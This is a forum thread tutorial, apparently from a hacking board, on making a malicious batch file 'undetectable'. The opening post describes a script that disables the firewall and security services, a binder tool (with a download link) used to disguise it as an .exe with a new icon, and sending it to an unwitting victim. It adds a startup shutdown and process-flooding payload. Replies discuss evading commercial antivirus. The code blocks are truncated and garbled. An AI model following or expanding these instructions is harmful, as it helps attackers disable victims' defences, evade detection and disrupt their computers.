![]() |
Undetectable Batch file.
Hello,this is a tutorial showing you how to make a batch file undetectable.
First,if you want to make your way thru the computer and not be seen or something,easiest way is to shutdown all firewalls/security. To do that you have to type in the following inside Notepad: Code:
@echo offShared Access and Firewall. Save the file as something.bat But this will probably fail because when the AV detects that it is a batch file it will automatically delete it. So What to do? Exe: Download nBinder Pro: Code:
h*tp://www.midload.com/en/file/29192/nbinder-rarDownload,and open. Click Add.. And add the batch file. Then you can bind it with self. By simply clicking Bind. That will convert the batch to .exe And then you change the icon. Com: Download: Bat2COM And convert it. When it is converted,send it to someone,and when he runs it he will see nothing,but a cmd window open and close. But what he doesn't see is that his firewall,security has closed. Now,to make the batch a little more dangerous. Code:
@echo offMakes a new batch file at startup which inside is the command shutdown -s Then starts cmd.exe command.com and mspaint.exe multiple,multiple times. Watch the CPU usage go up. hope that helps i see a lot of ppl asking how to do this so thought i show you all |
Re: Undetectable Batch file.
Thanks this helps alot...
|
Re: Undetectable Batch file.
no problem alos in one of your post you wanted to know what program i used to convert my batch files into picture files well these are the programs that i used
|
Re: Undetectable Batch file.
This is great but will it work with commercial antivirus and firewall programs apart from the ones from windows?
|
Re: Undetectable Batch file.
it can ive done it before
but i usualy insert this within the script Code:
@echo off and that does it |
Re: Undetectable Batch file.
You said something like "insert this within the script"...where in the script do we insert it. Can you give us a full code from beginning to end? Does this also disable bitdefender virus scanners as well?
|
Re: Undetectable Batch file.
undetectable? lol whenever i come to this page my avast alerts me of a trojan :D
|
Re: Undetectable Batch file.
:)
|
Re: Undetectable Batch file.
Tested Really it's undetected for Kaspersky IS 2009.
But When I start Parental Control, it's giving denied access |
Re: Undetectable Batch file.
hmmm il make a sript to block it one sec
|
| All times are GMT +5.5. The time now is 23:18. |